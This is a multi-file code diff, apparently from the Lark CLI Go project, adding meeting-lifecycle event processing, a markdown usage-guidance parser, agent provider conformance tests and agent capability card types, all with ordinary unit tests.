return json.Marshal(out)
}

View File

@@ -0,0 +1,281 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package vc
import (
"context"
"encoding/json"
"reflect"
"testing"
"time"
"github.com/larksuite/cli/internal/event"
)
func TestVCKeys_ProcessedMeetingLifecycleRegistered(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", t.TempDir())
for _, tc := range []struct {
eventType string
schemaType reflect.Type
}{
{eventTypeMeetingStarted, reflect.TypeOf(VCParticipantMeetingStartedOutput{})},
{eventTypeMeetingJoined, reflect.TypeOf(VCParticipantMeetingJoinedOutput{})},
} {
t.Run(tc.eventType, func(t *testing.T) {
def, ok := event.Lookup(tc.eventType)
if !ok {
t.Fatalf("%s should be registered via Keys()", tc.eventType)
}
if def.Schema.Custom == nil {
t.Error("Processed key must set Schema.Custom")
}
if def.Schema.Native != nil {
t.Error("Processed key must not set Schema.Native")
}
if def.Process == nil {
t.Error("Process must not be nil for processed key")
}
if def.PreConsume == nil {
t.Error("PreConsume must not be nil for processed key")
}
if len(def.Scopes) != 1 || def.Scopes[0] != "vc:meeting.meetingevent:read" {
t.Errorf("Scopes = %v", def.Scopes)
}
if len(def.AuthTypes) != 1 || def.AuthTypes[0] != "user" {
t.Errorf("AuthTypes = %v", def.AuthTypes)
}
if len(def.RequiredConsoleEvents) != 1 || def.RequiredConsoleEvents[0] != tc.eventType {
t.Errorf("RequiredConsoleEvents = %v", def.RequiredConsoleEvents)
}
if def.Schema.Custom.Type != tc.schemaType {
t.Errorf("Custom schema Type = %v, want %v", def.Schema.Custom.Type, tc.schemaType)
}
})
}
}
func TestProcessVCParticipantMeetingLifecycle(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", t.TempDir())
for _, tc := range []struct {
name string
eventType string
process event.ProcessFunc
}{
{
name: "started",
eventType: eventTypeMeetingStarted,
process: processVCParticipantMeetingStarted,
},
{
name: "joined",
eventType: eventTypeMeetingJoined,
process: processVCParticipantMeetingJoined,
},
} {
t.Run(tc.name, func(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_vc_lifecycle_001",
"event_type": "` + tc.eventType + `",
"create_time": "1608725989000",
"app_id": "cli_test"
},
"event": {
"meeting": {
"id": "6911188411934433028",
"topic": "my meeting",
"meeting_no": "235812466",
"start_time": "1608883322",
"end_time": "1608883899",
"calendar_event_id": "efa67a98-06a8-4df5-8559-746c8f4477ef_0"
}
}
}`
out := runMeetingLifecycleMap(t, tc.eventType, tc.process, payload)
if out["type"] != tc.eventType {
t.Errorf("type = %q", out["type"])
}
if out["event_id"] != "ev_vc_lifecycle_001" {
t.Errorf("event_id = %q", out["event_id"])
}
if out["timestamp"] != "1608725989000" {
t.Errorf("timestamp = %q", out["timestamp"])
}
if out["meeting_id"] != "6911188411934433028" {
t.Errorf("meeting_id = %q", out["meeting_id"])
}
if out["topic"] != "my meeting" || out["meeting_no"] != "235812466" {
t.Errorf("topic/meeting_no = %q/%q", out["topic"], out["meeting_no"])
}
if out["calendar_event_id"] != "efa67a98-06a8-4df5-8559-746c8f4477ef_0" {
t.Errorf("calendar_event_id = %q", out["calendar_event_id"])
}
if want := time.Unix(1608883322, 0).Local().Format(time.RFC3339); out["start_time"] != want {
t.Errorf("start_time = %q, want %q", out["start_time"], want)
}
if _, hasEndTime := out["end_time"]; hasEndTime {
t.Error("end_time should not be present in started/joined output")
}
})
}
}
func TestProcessVCParticipantMeetingLifecycle_InvalidMeetingTimes(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", t.TempDir())
for _, tc := range []struct {
name string
eventType string
process event.ProcessFunc
}{
{"started", eventTypeMeetingStarted, processVCParticipantMeetingStarted},
{"joined", eventTypeMeetingJoined, processVCParticipantMeetingJoined},
} {
t.Run(tc.name, func(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_vc_lifecycle_002",
"event_type": "` + tc.eventType + `",
"create_time": "1608725989001"
},
"event": {
"meeting": {
"id": "meeting_invalid_time",
"start_time": "bad",
"end_time": ""
}
}
}`
out := runMeetingLifecycleRaw(t, tc.eventType, tc.process, payload)
switch tc.eventType {
case eventTypeMeetingStarted:
var started VCParticipantMeetingStartedOutput
if err := json.Unmarshal(out, &started); err != nil {
t.Fatalf("Process output is not valid started JSON: %v\nraw=%s", err, string(out))
}
if started.StartTime != "" {
t.Errorf("StartTime = %q, want empty string", started.StartTime)
}
case eventTypeMeetingJoined:
var joined VCParticipantMeetingJoinedOutput
if err := json.Unmarshal(out, &joined); err != nil {
t.Fatalf("Process output is not valid joined JSON: %v\nraw=%s", err, string(out))
}
if joined.StartTime != "" {
t.Errorf("StartTime = %q, want empty string", joined.StartTime)
}
}
})
}
}
func TestProcessVCParticipantMeetingLifecycle_MalformedPayload(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", t.TempDir())
for _, tc := range []struct {
name string
eventType string
process event.ProcessFunc
}{
{"started", eventTypeMeetingStarted, processVCParticipantMeetingStarted},
{"joined", eventTypeMeetingJoined, processVCParticipantMeetingJoined},
} {
t.Run(tc.name, func(t *testing.T) {
raw := &event.RawEvent{
EventType: tc.eventType,
Payload: json.RawMessage(`not json`),
Timestamp: time.Now(),
}
got, err := tc.process(context.Background(), nil, raw, nil)
if err != nil {
t.Fatalf("Process should swallow parse errors, got %v", err)
}
if string(got) != "not json" {
t.Errorf("malformed fallback output = %q, want original bytes", string(got))
}
})
}
}
func TestVCParticipantMeetingLifecycle_PreConsumeSubscriptionLifecycle(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", t.TempDir())
for _, eventType := range []string{eventTypeMeetingStarted, eventTypeMeetingJoined} {
t.Run(eventType, func(t *testing.T) {
def, ok := event.Lookup(eventType)
if !ok {
t.Fatalf("%s should be registered via Keys()", eventType)
}
type call struct {
method string
path string
body any
}
var calls []call
rt := &stubAPIClient{
callFn: func(_ context.Context, method, path string, body any) (json.RawMessage, error) {
calls = append(calls, call{method: method, path: path, body: body})
return json.RawMessage(`{"code":0,"msg":"success","data":{}}`), nil
},
}
cleanup, err := def.PreConsume(context.Background(), rt, nil)
if err != nil {
t.Fatalf("PreConsume error: %v", err)
}
if cleanup == nil {
t.Fatal("cleanup must not be nil")
}
if len(calls) != 1 {
t.Fatalf("calls after subscribe = %d, want 1", len(calls))
}
if calls[0].method != "POST" || calls[0].path != pathMeetingSubscribe {
t.Fatalf("subscribe call = %+v", calls[0])
}
assertSubscriptionRequest(t, calls[0].body, eventType)
cleanup()
if len(calls) != 2 {
t.Fatalf("calls after cleanup = %d, want 2", len(calls))
}
if calls[1].method != "POST" || calls[1].path != pathMeetingUnsubscribe {
t.Fatalf("unsubscribe call = %+v", calls[1])
}
assertSubscriptionRequest(t, calls[1].body, eventType)
})
}
}
func runMeetingLifecycleMap(t *testing.T, eventType string, process event.ProcessFunc, payload string) map[string]string {
t.Helper()
got := runMeetingLifecycleRaw(t, eventType, process, payload)
if got == nil {
t.Fatal("Process output is nil")
}
var out map[string]string
if err := json.Unmarshal(got, &out); err != nil {
t.Fatalf("Process output is not valid flat JSON object: %v\nraw=%s", err, string(got))
}
return out
}
func runMeetingLifecycleRaw(t *testing.T, eventType string, process event.ProcessFunc, payload string) json.RawMessage {
t.Helper()
raw := &event.RawEvent{
EventType: eventType,
Payload: json.RawMessage(payload),
Timestamp: time.Now(),
}
got, err := process(context.Background(), nil, raw, nil)
if err != nil {
t.Fatalf("Process error: %v", err)
}
return got
}

View File

@@ -0,0 +1,61 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package vc
import (
"context"
"encoding/json"
"github.com/larksuite/cli/internal/event"
)
// VCParticipantMeetingStartedOutput is the flattened shape for vc.meeting.participant_meeting_started_v1.
type VCParticipantMeetingStartedOutput struct {
Type string `json:"type" desc:"Event type; always vc.meeting.participant_meeting_started_v1"`
EventID string `json:"event_id,omitempty" desc:"Globally unique event ID; safe for deduplication"`
Timestamp string `json:"timestamp,omitempty" desc:"Event delivery time (ms timestamp string); taken from header.create_time when present" kind:"timestamp_ms"`
MeetingID string `json:"meeting_id,omitempty" desc:"Meeting ID" kind:"meeting_id"`
Topic string `json:"topic,omitempty" desc:"Meeting topic"`
MeetingNo string `json:"meeting_no,omitempty" desc:"Meeting number"`
StartTime string `json:"start_time,omitempty" desc:"Meeting start time in RFC3339, converted to the local timezone"`
CalendarEventID string `json:"calendar_event_id,omitempty" desc:"Calendar event ID associated with the meeting"`
}
func processVCParticipantMeetingStarted(_ context.Context, _ event.APIClient, raw *event.RawEvent, _ map[string]string) (json.RawMessage, error) {
var envelope struct {
Header struct {
EventID string `json:"event_id"`
EventType string `json:"event_type"`
CreateTime string `json:"create_time"`
} `json:"header"`
Event struct {
Meeting struct {
ID string `json:"id"`
Topic string `json:"topic"`
MeetingNo string `json:"meeting_no"`
StartTime string `json:"start_time"`
CalendarEventID string `json:"calendar_event_id"`
} `json:"meeting"`
} `json:"event"`
}
if err := json.Unmarshal(raw.Payload, &envelope); err != nil {
return raw.Payload, nil //nolint:nilerr // passthrough on malformed payload so consumers still see the event
}
meeting := envelope.Event.Meeting
out := &VCParticipantMeetingStartedOutput{
Type: envelope.Header.EventType,
EventID: envelope.Header.EventID,
Timestamp: envelope.Header.CreateTime,
MeetingID: meeting.ID,
Topic: meeting.Topic,
MeetingNo: meeting.MeetingNo,
StartTime: unixSecondsToLocalRFC3339(meeting.StartTime),
CalendarEventID: meeting.CalendarEventID,
}
if out.Type == "" {
out.Type = raw.EventType
}
return json.Marshal(out)
}

View File

@@ -11,6 +11,8 @@ import (
)
const (
eventTypeMeetingStarted = "vc.meeting.participant_meeting_started_v1"
eventTypeMeetingJoined = "vc.meeting.participant_meeting_joined_v1"
eventTypeMeetingEnded = "vc.meeting.participant_meeting_ended_v1"
eventTypeNoteGenerated = "vc.note.generated_v1"
eventTypeRecordingStarted = "vc.recording.recording_started_v1"
@@ -30,6 +32,38 @@ const (
// Keys returns all VC-domain EventKey definitions.
func Keys() []event.KeyDefinition {
return []event.KeyDefinition{
{
Key: eventTypeMeetingStarted,
DisplayName: "Participant meeting started",
Description: "Triggered when a meeting the current user participates in has started",
EventType: eventTypeMeetingStarted,
Schema: event.SchemaDef{
Custom: &event.SchemaSpec{Type: reflect.TypeOf(VCParticipantMeetingStartedOutput{})},
},
Process: processVCParticipantMeetingStarted,
PreConsume: subscriptionPreConsume(eventTypeMeetingStarted, pathMeetingSubscribe, pathMeetingUnsubscribe),
Scopes: []string{"vc:meeting.meetingevent:read"},
AuthTypes: []string{
"user",
},
RequiredConsoleEvents: []string{eventTypeMeetingStarted},
},
{
Key: eventTypeMeetingJoined,
DisplayName: "Participant meeting joined",
Description: "Triggered when the current user joins a meeting",
EventType: eventTypeMeetingJoined,
Schema: event.SchemaDef{
Custom: &event.SchemaSpec{Type: reflect.TypeOf(VCParticipantMeetingJoinedOutput{})},
},
Process: processVCParticipantMeetingJoined,
PreConsume: subscriptionPreConsume(eventTypeMeetingJoined, pathMeetingSubscribe, pathMeetingUnsubscribe),
Scopes: []string{"vc:meeting.meetingevent:read"},
AuthTypes: []string{
"user",
},
RequiredConsoleEvents: []string{eventTypeMeetingJoined},
},
{
Key: eventTypeMeetingEnded,
DisplayName: "Participant meeting ended",

View File

@@ -0,0 +1,96 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// Package affordance is the lazily-loaded store of usage guidance for
// service-API methods. The source of truth is one markdown file per service in
// the top-level affordance/ tree (see mdparse.go), injected via SetSource so
// domain owners maintain it next to skills/ and shortcuts/. A service is read
// and parsed at most once, on first access, so normal command execution never
// touches it.
package affordance
import (
"encoding/json"
"io/fs"
"strings"
"sync"
"github.com/larksuite/cli/internal/apicatalog"
"github.com/larksuite/cli/internal/registry"
)
var (
mu sync.Mutex
byService = map[string]map[string]json.RawMessage{}
tried = map[string]bool{}
mdSource fs.FS // top-level affordance/*.md tree; nil in the minimal preview build
)
// SetSource installs the markdown guidance tree (the top-level affordance/
// directory) as the source. Called once at startup before any lookup; clears
// the parse cache so re-sourcing (e.g. in tests) takes effect.
func SetSource(fsys fs.FS) {
mu.Lock()
defer mu.Unlock()
mdSource = fsys
byService = map[string]map[string]json.RawMessage{}
tried = map[string]bool{}
}
// For returns the raw affordance overlay for one method, loading the owning
// service on first access. ok is false when there is no entry (absent source,
// parse failure, or unknown method all collapse to "no guidance").
func For(service, methodID string) (json.RawMessage, bool) {
mu.Lock()
defer mu.Unlock()
if !tried[service] {
tried[service] = true
byService[service] = loadService(service)
}
raw, ok := byService[service][methodID]
return raw, ok && len(raw) > 0
}
// loadService parses a service's markdown guidance into per-method overlays,
// marshalling each to JSON so downstream callers keep the same wire shape.
func loadService(service string) map[string]json.RawMessage {
if mdSource == nil {
return nil
}
src, err := fs.ReadFile(mdSource, service+".md")
if err != nil {
return nil
}
m := map[string]json.RawMessage{}
for id, a := range parseDomainMD(src, commandFormResolver(service)) {
if b, err := json.Marshal(a); err == nil {
m[id] = b
}
}
return m
}
// commandFormResolver maps a method's command-form heading ("user_mailbox.messages
// list") to its method id ("user_mailbox.message.list") via the registry's
// authoritative resource↔id table. Resource names are irregularly pluralised
// (message/messages, user_mailbox/user_mailboxes), so this cannot be guessed; the
// space→dot fallback covers domains where the two already coincide.
func commandFormResolver(service string) func(string) string {
byForm := map[string]string{}
for _, svc := range registry.EmbeddedServicesTyped() {
if svc.Name != service {
continue
}
for _, ref := range apicatalog.ServiceMethods(svc, nil) {
byForm[strings.Join(ref.CommandPath()[1:], " ")] = ref.Method.ID
}
break
}
return func(h string) string {
h = strings.TrimSpace(h)
if id, ok := byForm[h]; ok {
return id
}
return strings.ReplaceAll(h, " ", ".")
}
}

View File

@@ -0,0 +1,86 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package affordance
import (
"encoding/json"
"testing"
"testing/fstest"
)
// fixtureMD is a minimal affordance source: two methods, each with a lead
// paragraph (use_when) and a fenced example.
const fixtureMD = "# approval\n" +
"> skill: lark-approval\n\n" +
"## instances cc\n" +
"把一个审批实例抄送给指定用户。\n\n" +
"### Examples\n\n" +
"**抄送给用户**\n" +
"```bash\n" +
"lark-cli approval instances cc --data '{\"instance_code\":\"x\"}'\n" +
"```\n\n" +
"## instances get\n" +
"查询某审批实例详情。\n\n" +
"### Examples\n\n" +
"**按 code 查询**\n" +
"```bash\n" +
"lark-cli approval instances get --instance-code \"x\"\n" +
"```\n"
func TestFor(t *testing.T) {
prev := mdSource
t.Cleanup(func() { SetSource(prev) }) // SetSource mutates package state; restore for test isolation
SetSource(fstest.MapFS{"approval.md": &fstest.MapFile{Data: []byte(fixtureMD)}})
// A seeded method in a seeded service resolves to its overlay.
raw, ok := For("approval", "instances.cc")
if !ok {
t.Fatal(`For("approval","instances.cc") ok=false, want an overlay`)
}
var a struct {
UseWhen []string `json:"use_when"`
Examples []struct {
Command string `json:"command"`
} `json:"examples"`
}
if err := json.Unmarshal(raw, &a); err != nil {
t.Fatalf("overlay is not valid affordance JSON: %v", err)
}
if len(a.UseWhen) == 0 || len(a.Examples) == 0 || a.Examples[0].Command == "" {
t.Errorf("overlay missing use_when/examples: %s", raw)
}
// Misses: unknown method in a known service, and an unknown service, both
// resolve to ok=false (no panic, no error) so callers treat them as "no
// guidance".
if _, ok := For("approval", "instances.no_such_method"); ok {
t.Error("unknown method should be ok=false")
}
if _, ok := For("no_such_service", "x.y"); ok {
t.Error("unknown service should be ok=false")
}
// A second lookup of the same service is served from cache (parsed at most
// once) and stays consistent.
if _, ok := For("approval", "instances.get"); !ok {
t.Error("second lookup in a cached service should still resolve")
}
}
// Non-bullet paragraph lines under any section are preserved as items, not
// dropped (regression: they previously only updated pending, lost without a fence).
func TestParseDomainMD_ParagraphNotDropped(t *testing.T) {
md := "# d\n\n## foo bar\nwhat it does.\n\n### Tips\n- a bullet\nplain paragraph note.\n\n### See also\nrun [[other cmd]] first.\n"
got := parseDomainMD([]byte(md), nil) // nil resolver -> space->dot, "foo bar" -> "foo.bar"
a, ok := got["foo.bar"]
if !ok {
t.Fatal("method not parsed")
}
if len(a.Tips) != 2 || a.Tips[1] != "plain paragraph note." {
t.Errorf("Tips paragraph dropped: %v", a.Tips)
}
if len(a.Extensions) != 1 || len(a.Extensions[0].Items) != 1 || a.Extensions[0].Items[0] != "run `other cmd` first." {
t.Errorf("custom-section paragraph not flowed through: %+v", a.Extensions)
}
}

View File

@@ -0,0 +1,180 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package affordance
import (
"regexp"
"strings"
"github.com/larksuite/cli/internal/meta"
)
// The affordance source is a narrow, fixed markdown subset (see src/*.md):
//
// # domain optional `> skill: <name>` applied to every method
// ## command e.g. `instances get`
// <lead paragraph> -> use_when (when this command is right)
// ### Avoid when -> avoid_when (links become prefer/alternative edges)
// ### Prerequisites -> prerequisites (a "…来自 [[x]]" link is a sequence edge)
// ### Tips -> tips
// ### Examples -> examples: **description** + a ```fenced``` command
// ### <other> -> extensions[] (custom section, flows through verbatim)
// [[cmd]] -> a command reference, rendered as `cmd`
//
// Parsing is lazy and cached (see For), so the constrained grammar is read at
// most once per domain.
var mdLink = regexp.MustCompile(`\[\[(.+?)\]\]`)
// standardSection maps a section heading to its typed Affordance field; any
// other heading becomes an extension.
var standardSection = map[string]string{
"Avoid when": "avoid_when",
"Prerequisites": "prerequisites",
"Tips": "tips",
"Examples": "examples",
}
func linkToBacktick(s string) string { return mdLink.ReplaceAllString(s, "`$1`") }
// headingToKey maps a command heading ("instances get") to its affordance key
// ("instances.get"). The space→dot rule holds where the command form matches
// the method id; domains whose resource names differ (e.g. plural "messages"
// vs id segment "message") need the registry's authoritative resource↔id table.
func headingToKey(h string) string {
return strings.ReplaceAll(strings.TrimSpace(h), " ", ".")
}
type mdSection struct {
label string
items []string
cases []meta.AffordanceCase
}
// parseDomainMD parses one domain's markdown into per-method Affordance values,
// keyed by method id. resolve maps a command-form heading ("user_mailbox.messages
// list") to its method id ("user_mailbox.message.list"); nil falls back to the
// space→dot rule (valid only where the command form already equals the id).
func parseDomainMD(src []byte, resolve func(string) string) map[string]meta.Affordance {
if resolve == nil {
resolve = headingToKey
}
out := map[string]meta.Affordance{}
var skill, curKey string
var useWhen, para []string // lead paragraphs -> use_when entries (blank line separates)
var secs []*mdSection
var sec *mdSection
var pending string
var fence []string
inFence := false
assemble := func() {
if curKey == "" {
return
}
if len(para) > 0 {
useWhen = append(useWhen, strings.TrimSpace(strings.Join(para, " ")))
para = nil
}
var a meta.Affordance
if len(useWhen) > 0 {
a.UseWhen = useWhen
}
for _, s := range secs {
switch standardSection[s.label] {
case "avoid_when":
a.AvoidWhen = s.items
case "prerequisites":
a.Prerequisites = s.items
case "tips":
a.Tips = s.items
case "examples":
a.Examples = s.cases
default:
a.Extensions = append(a.Extensions, meta.AffordanceSection{Label: s.label, Items: s.items})
}
}
if skill != "" {
a.Skills = []string{skill}
}
out[curKey] = a
}
reset := func() { useWhen, para, secs, sec, pending, fence, inFence = nil, nil, nil, nil, "", nil, false }
// flushPending appends a non-bullet paragraph line that was not consumed as
// an example description (i.e. no fence followed) to the current section's
// items, so prose under any section is preserved rather than dropped.
flushPending := func() {
if sec != nil && pending != "" {
sec.items = append(sec.items, linkToBacktick(pending))
pending = ""
}
}
for _, raw := range strings.Split(string(src), "\n") {
line := strings.TrimRight(raw, "\r")
t := strings.TrimSpace(line)
switch {
case strings.HasPrefix(line, "## "):
flushPending()
assemble()
curKey = resolve(line[3:])
reset()
continue
case strings.HasPrefix(line, "# "):
continue
case strings.HasPrefix(t, "> skill:"):
skill = strings.TrimSpace(t[len("> skill:"):])
continue
case strings.HasPrefix(line, "### "):
flushPending()
sec = &mdSection{label: strings.TrimSpace(line[4:])}
secs = append(secs, sec)
pending, fence, inFence = "", nil, false
continue
}
if curKey == "" {
continue
}
if sec == nil { // lead paragraphs before any section -> use_when (blank line separates entries)
if t == "" {
if len(para) > 0 {
useWhen = append(useWhen, strings.Join(para, " "))
para = nil
}
} else {
para = append(para, t)
}
continue
}
// inside a section: a fenced block is an example command; otherwise the
// shape follows the writing (bullet item vs **description** before a fence).
if strings.HasPrefix(t, "```") {
if !inFence {
inFence, fence = true, nil
} else {
inFence = false
sec.cases = append(sec.cases, meta.AffordanceCase{Description: pending, Command: strings.Join(fence, "\n")})
pending = ""
}
continue
}
if inFence {
fence = append(fence, line)
continue
}
if strings.HasPrefix(t, "-") {
flushPending()
sec.items = append(sec.items, linkToBacktick(strings.TrimSpace(t[1:])))
} else if t != "" {
flushPending()
pending = strings.Trim(t, "* ")
}
}
flushPending()
assemble()
return out
}

View File

@@ -0,0 +1,163 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// Package agenttest provides provider conformance tests: a new integrator calls
// RunConformance in its own test to lock down registration metadata, the
// zero-value Deps contract, Card single-sourcing, and other implicit contracts.
// All assertions run offline (zero-value Deps, no API calls).
package agenttest
import (
"context"
"reflect"
"strings"
"testing"
"github.com/larksuite/cli/internal/agent"
)
// RunConformance runs the full set of conformance assertions against a
// registered scheme. sampleAgentID must be a valid agent id for which the
// provider can produce a Card (catalog-type: an id from the catalog;
// instance-type: any non-empty id).
func RunConformance(t *testing.T, scheme, sampleAgentID string) {
t.Helper()
info, ok := agent.Info(scheme)
if !ok {
t.Fatalf("conformance: scheme %q not registered (the provider package must be imported to trigger init registration)", scheme)
}
t.Run("metadata", func(t *testing.T) {
if info.Label == "" {
t.Error("conformance: ProviderInfo.Label must not be empty")
}
if info.AgentIDSource == "" {
t.Error("conformance: ProviderInfo.AgentIDSource must not be empty")
}
if info.Kind != agent.KindCatalog && info.Kind != agent.KindInstance {
t.Errorf("conformance: Kind should be %q|%q, got %q", agent.KindCatalog, agent.KindInstance, info.Kind)
}
if !strings.HasPrefix(info.AgentRefFormat, scheme+":") {
t.Errorf("conformance: AgentRefFormat should start with %q, got %q", scheme+":", info.AgentRefFormat)
}
if len(info.Identities) == 0 {
t.Error("conformance: Identities must not be empty")
}
for i, id := range info.Identities {
if id.Type != agent.IdentityUser && id.Type != agent.IdentityBot {
t.Errorf("conformance: Identities[%d].Type should be user|bot, got %q", i, id.Type)
}
}
seen := make(map[string]bool, len(info.RequiredScopes))
for _, s := range info.RequiredScopes {
if seen[s] {
t.Errorf("conformance: RequiredScopes contains duplicate %q", s)
}
seen[s] = true
}
})
t.Run("factory", func(t *testing.T) {
p, err := info.Factory(agent.Deps{}, sampleAgentID)
if err != nil {
t.Fatalf("conformance: Factory must accept zero-value Deps (expected nil error), got %v", err)
}
if p == nil {
t.Fatal("conformance: Factory must not return a nil provider")
}
// Core fields are mandatory (the command layer dispatches them without a
// nil-check); Register enforces this at registration, re-assert here.
if p.Send == nil {
t.Error("conformance: Provider.Send (core) must be wired")
}
if p.GetTask == nil {
t.Error("conformance: Provider.GetTask (core) must be wired")
}
})
t.Run("card", func(t *testing.T) {
newCard := func() *agent.AgentCard {
t.Helper()
p, err := info.Factory(agent.Deps{}, sampleAgentID)
if err != nil {
t.Fatalf("conformance: Factory(zero-value Deps) returned error: %v", err)
}
card, err := agent.BuildCard(context.Background(), scheme, sampleAgentID, p)
if err != nil {
t.Fatalf("conformance: BuildCard should be available offline (expected nil error), got %v", err)
}
if card == nil {
t.Fatal("conformance: Card must not return nil")
}
return card
}
card := newCard()
if card.Provider != scheme {
t.Errorf("conformance: Card.Provider should be %q, got %q", scheme, card.Provider)
}
if card.AgentID != sampleAgentID {
t.Errorf("conformance: Card.AgentID should echo the constructor input %q, got %q", sampleAgentID, card.AgentID)
}
if card.ProviderLabel != info.Label {
t.Errorf("conformance: Card.ProviderLabel should equal the registered Label %q, got %q", info.Label, card.ProviderLabel)
}
if !reflect.DeepEqual(card.Identity, info.Identities) {
t.Errorf("conformance: Card.Identity should match the registered Identities (single source), expected %+v got %+v", info.Identities, card.Identity)
}
if card.AgentIDSource != info.AgentIDSource {
t.Errorf("conformance: Card.AgentIDSource should equal the registered value %q, got %q", info.AgentIDSource, card.AgentIDSource)
}
if card.Parameters == nil {
t.Error("conformance: Card.Parameters must not be nil (always emitted, empty is [])")
}
// Single-sourcing: two independent instances each produce a Card, and the
// results must DeepEqual (no hidden instance state).
if card2 := newCard(); !reflect.DeepEqual(card, card2) {
t.Errorf("conformance: Cards from two instances should DeepEqual (single source), got\n%+v\nvs\n%+v", card, card2)
}
})
if info.Kind == agent.KindCatalog {
t.Run("discovery", func(t *testing.T) {
p, err := info.Factory(agent.Deps{}, sampleAgentID)
if err != nil {
t.Fatalf("conformance: Factory(zero-value Deps) returned error: %v", err)
}
if p.ListAgents == nil {
t.Fatal("conformance: catalog-type provider must wire ListAgents")
}
list, err := p.ListAgents(context.Background())
if err != nil {
t.Fatalf("conformance: catalog-type ListAgents should be available offline (expected nil error), got %v", err)
}
wantRef := scheme + ":" + sampleAgentID
found := false
for i, a := range list {
r, err := agent.ParseRef(a.AgentRef)
if err != nil {
t.Errorf("conformance: ListAgents[%d].AgentRef %q should be parseable by agent.ParseRef: %v", i, a.AgentRef, err)
continue
}
if r.Scheme != scheme {
t.Errorf("conformance: ListAgents[%d].AgentRef %q scheme should be %q, got %q", i, a.AgentRef, scheme, r.Scheme)
}
if a.Name == "" {
t.Errorf("conformance: ListAgents[%d] (%s) Name must not be empty", i, a.AgentRef)
}
if a.AgentRef == wantRef {
found = true
}
}
if !found {
t.Errorf("conformance: sampleAgentID should appear in the enumeration (expected to contain %q), got %+v", wantRef, list)
}
list2, err := p.ListAgents(context.Background())
if err != nil {
t.Fatalf("conformance: second ListAgents returned error: %v", err)
}
if !reflect.DeepEqual(list, list2) {
t.Errorf("conformance: two consecutive ListAgents results should DeepEqual (stable enumeration), got\n%+v\nvs\n%+v", list, list2)
}
})
}
}

155
internal/agent/card.go Normal file
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import "context"
// capability key constants (the JSON key names in capabilities, also the
// capability identifiers used by Supports / capabilityError). Only capabilities
// that "can change the AI's next command line and are currently deliverable" are
// exposed.
const (
CapTaskGet = "task_get"
CapTaskList = "task_list"
CapTaskCancel = "task_cancel"
CapInputRequired = "input_required"
CapFileInput = "file_input"
CapArtifactDownload = "artifact_download"
CapMultiTurn = "multi_turn"
)
// Capabilities is the closed set of capabilities: making it a struct means an
// omitted field is an explicit false and a typo is a compile error. Fields are
// ordered by json tag alphabetically to keep the key order identical to the old
// map serialization.
type Capabilities struct {
ArtifactDownload bool `json:"artifact_download"`
FileInput bool `json:"file_input"`
InputRequired bool `json:"input_required"`
MultiTurn bool `json:"multi_turn"`
TaskCancel bool `json:"task_cancel"`
TaskGet bool `json:"task_get"`
TaskList bool `json:"task_list"`
}
// AgentCard is a remote agent's capability card (schema v2): provider metadata,
// the supported capability matrix, identity precondition declarations, and
// parameter / skill declarations (scopes are not in the card; they are internal
// registration data for preflight only).
type AgentCard struct {
Provider string `json:"provider"`
ProviderLabel string `json:"provider_label"`
AgentID string `json:"agent_id"`
Name string `json:"name,omitempty"` // dynamic card only
Description string `json:"description,omitempty"`
Capabilities Capabilities `json:"capabilities"`
Identity []IdentitySpec `json:"identity"`
Parameters []CardParam `json:"parameters"` // always emitted (empty is [])
AgentIDSource string `json:"agent_id_source"`
Skills []CardSkill `json:"skills,omitempty"`
}
// NewCard fills in all fields known at registration time from the registration
// info (Provider/ProviderLabel/Identity/AgentIDSource/empty Parameters); the
// integrator only supplies the per-agent part (Capabilities, plus Name/
// Description for catalog types). An unregistered scheme is a programming error
// (a provider should only pass its own scheme), so it panics fail-fast.
func NewCard(scheme, agentID string) *AgentCard {
info, ok := Info(scheme)
if !ok {
panic("agent: NewCard for unregistered scheme: " + scheme)
}
return &AgentCard{
Provider: scheme,
ProviderLabel: info.Label,
AgentID: agentID,
Identity: info.Identities,
Parameters: []CardParam{},
AgentIDSource: info.AgentIDSource,
}
}
// DeriveCapabilities computes the capability matrix from which Provider fields
// are wired — the single source of truth. The method-backed capabilities are
// derived from the corresponding func field being non-nil (implement it =
// support it); file_input / input_required are behavioral flags with no backing
// method and are read straight from the struct. Send/GetTask are mandatory
// (Register enforces), so task_get is always true.
func DeriveCapabilities(p *Provider) Capabilities {
return Capabilities{
TaskGet: p.GetTask != nil,
TaskList: p.ListTasks != nil,
TaskCancel: p.CancelTask != nil,
ArtifactDownload: p.DownloadArtifact != nil,
MultiTurn: p.ListContexts != nil,
FileInput: p.FileInput,
InputRequired: p.InputRequired,
}
}
// BuildCard synthesizes an agent's full Card: NewCard fills the
// registration-time fields, DeriveCapabilities fills the matrix from the wired
// fields, and Describe (if the provider set it) supplies the per-agent
// Name/Description/Parameters/Skills and validates the agent_id. A provider
// therefore never assembles its own card or declares its own capability bools.
func BuildCard(ctx context.Context, scheme, agentID string, p *Provider) (*AgentCard, error) {
card := NewCard(scheme, agentID)
card.Capabilities = DeriveCapabilities(p)
if p.Describe != nil {
info, err := p.Describe(ctx)
if err != nil {
return nil, err
}
if info != nil {
card.Name = info.Name
card.Description = info.Description
if info.Parameters != nil {
card.Parameters = info.Parameters
}
card.Skills = info.Skills
}
}
return card, nil
}
// CardParam is one input parameter declared by a Card (used for --param validation).
type CardParam struct {
Name string `json:"name"`
Type string `json:"type"`
Required bool `json:"required"`
Desc string `json:"desc,omitempty"`
}
// CardSkill is one skill / scenario declared by a Card (with example usages).
type CardSkill struct {
ID string `json:"id"`
Name string `json:"name,omitempty"`
Examples []string `json:"examples,omitempty"`
}
